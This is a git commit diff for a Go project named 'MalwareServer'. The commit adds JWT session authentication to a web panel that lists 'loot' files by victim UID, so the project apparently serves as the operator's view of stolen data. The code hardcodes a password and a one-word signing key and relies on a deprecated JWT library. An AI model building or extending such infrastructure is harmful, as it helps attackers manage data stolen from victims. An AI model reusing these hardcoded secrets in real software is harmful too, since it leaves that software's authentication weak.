Auth

2024-05-04 02:07:20 +02:00 · 2024-05-04 02:07:20 +02:00 · fbc0738bf6
commit fbc0738bf6
parent 945695f148
3 changed files with 46 additions and 7 deletions
--- a/go.mod
+++ b/go.mod
@ -2,4 +2,7 @@ module MalwareServer

 go 1.22.2

-require github.com/liamg/magic v0.0.1 // indirect
+require (
+	github.com/dgrijalva/jwt-go v3.2.0+incompatible // indirect
+	github.com/liamg/magic v0.0.1 // indirect
+)
--- a/go.sum
+++ b/go.sum
@ -1,2 +1,4 @@
+github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumCAMpl/TFQ4/5kLM=
+github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ=
 github.com/liamg/magic v0.0.1 h1:Ru22ElY+sCh6RvRTWjQzKKCxsEco8hE0co8n1qe7TBM=
 github.com/liamg/magic v0.0.1/go.mod h1:yQkOmZZI52EA+SQ2xyHpVw8fNvTBruF873Y+Vt6S+fk=
--- a/loothandler.go
+++ b/loothandler.go
@ -8,19 +8,27 @@ import (
 	"net/http"
 	"path/filepath"
 	"strings"
+	"time"
+
+	"github.com/dgrijalva/jwt-go"
 )

 var (
 	password          = "hardcodedpassword"
 	lootPath          = "Loot"
 	sessionCookieName = "auth_session"
-)
+	secretKey         = []byte("key"))

 type PageData struct {
 	UIDs  []string
 	Files []string
 }

+type Claims struct {
+	Username string `json:"username"`
+	jwt.StandardClaims
+}
+
 func main() {
 	http.HandleFunc("/", logMiddleware(loginHandler))
 	http.HandleFunc("/loot", logMiddleware(lootHandler))
@ -45,12 +53,28 @@ func loginHandler(w http.ResponseWriter, r *http.Request) {
 	}

 	if r.FormValue("password") == password {
+		expirationTime := time.Now().Add(1 * time.Hour)
+		claims := &Claims{
+			Username: "root",
+			StandardClaims: jwt.StandardClaims{
+				ExpiresAt: expirationTime.Unix(),
+			},
+		}
+
+		token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
+		tokenString, err := token.SignedString(secretKey)
+		if err != nil {
+			http.Error(w, err.Error(), http.StatusInternalServerError)
+			return
+		}
+
 		http.SetCookie(w, &http.Cookie{
 			Name:    sessionCookieName,
-			Value:  "authenticated",
+			Value:   tokenString,
+			Expires: expirationTime,
 			Path:    "/",
-			MaxAge: 3600,
 		})
+
 		http.Redirect(w, r, "/loot", http.StatusSeeOther)
 		return
 	}
@ -100,9 +124,19 @@ func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {

 func isAuthenticated(r *http.Request) bool {
 	sessionCookie, err := r.Cookie(sessionCookieName)
-	if err != nil || sessionCookie.Value != "authenticated" {
+	if err != nil {
 		return false
 	}
+
+	tokenString := sessionCookie.Value
+	token, err := jwt.ParseWithClaims(tokenString, &Claims{}, func(token *jwt.Token) (interface{}, error) {
+		return secretKey, nil
+	})
+
+	if err != nil || !token.Valid {
+		return false
+	}
+
 	return true
 }